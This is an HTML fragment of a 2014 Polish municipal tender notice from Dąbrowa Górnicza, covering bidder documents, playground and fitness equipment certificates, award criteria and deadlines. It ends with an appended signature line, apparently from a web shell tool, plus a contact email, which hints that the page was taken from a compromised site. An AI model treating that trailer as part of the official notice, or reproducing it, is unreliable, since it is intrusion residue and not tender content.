<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy przedłożyć:
1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania c i (-lub) zadania D.
2. Formularz cenowy - załącznik nr 1 A do SIWZ (wskazana data podpisania) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania c i (-lub) zadania D.
3. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej) - dotyczy zadania A i (-lub) zadania B i (-lub) zadania c i (-lub) zadania D.
4.w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b ustawy - dotyczy zadania A i (-lub) zadania B i (-lub) zadania c i (-lub) zadania D.
5.W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, (pkt. III.5 ogłoszenia) Zamawiający żąda, aby Wykonawca załączył do oferty:
1.  zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom podanym w pkt. II.1.4) IV ogłoszenia  lub specyfikacjom technicznym tj. aktualne certyfikaty zgodności z normami PN-EN 1176 oraz PN-EN 957.
Uwaga: 
1. Wykonawca może zamiast zaświadczeń, o których mowa w pkt. II.1.4) IV ogłoszenia  złożyć równoważne zaświadczenia wystawione przez podmioty mające siedzibę w innym państwie członkowskim Europejskiego Obszaru Gospodarczego.
2. . Wykonawca może zamiast zaświadczeń, o których mowa  w pkt. II.1.4) IV ogłoszenia złożyć inne dokumenty potwierdzające odpowiednio stosowanie przez wykonawcę równoważnych środków zapewnienia jakości i stosowanie równoważnych środków zarządzania środowiskiem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1 w zakresie zmiany terminów:
1.1.w zakresie zmiany terminu wykonania zamówienia, na skutek siły wyższej co oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1. zmiany podatku VAT na skutek zmian w przepisach prawnych:
a) w przypadku zwiększenia stawki podatku  VAT- wartość wynagrodzenia brutto  nie ulegnie  zmianie w okresie    obowiązywania umowy.
b) w przypadku zmniejszenia stawki podatku  VAT - wartość wynagrodzenia brutto  zostanie  pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT.
3. W przypadku wystąpienia wyżej wymienionych okoliczności strony poinformują się natychmiast o ich zaistnieniu.
4. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
6. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 8/1, i (-lub) 8/2, i (-lub) 8/3, i (-lub) 8/4  do SIWZ - projekt umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21,  Wydział Gospodarki Komunalnej i Mieszkaniowej, III piętro, pokój nr 315 b..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2014 godzina 11:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest współfinansowane ze środków  Unii Europejskiej. 2. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (dotyczy zadania A,B,C,D). 3.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udział w postępowaniu określone w pkt. 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie  z zapisami zawartymi w pkt. 9 SIWZ. 3.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. i 9.3. SIWZ podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, dokumenty wymienione w pkt. 9.1.2. i 9.1.3. SIWZ, Formularz ofertowy wymieniony w pkt. 9.5.1. oraz Formularze cenowe, o których mowa w pkt. 9.5.2.  SIWZ składają wszyscy Wykonawcy wspólnie lub pełnomocnik w imieniu wszystkich Wykonawców. Dokumenty wymienione w pkt. 9.4. SIWZ Wykonawcy składają wspólnie.
3.3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3.4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Kody CPV określone w sekcji II pkt 1.6. ogłoszenia , termin realizacji wskazany w sekcji II pkt 2, jak również kryterium oceny ofert - sekcja IV.pkt 2.1 są wspólne dla wszystkich zadań częściowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com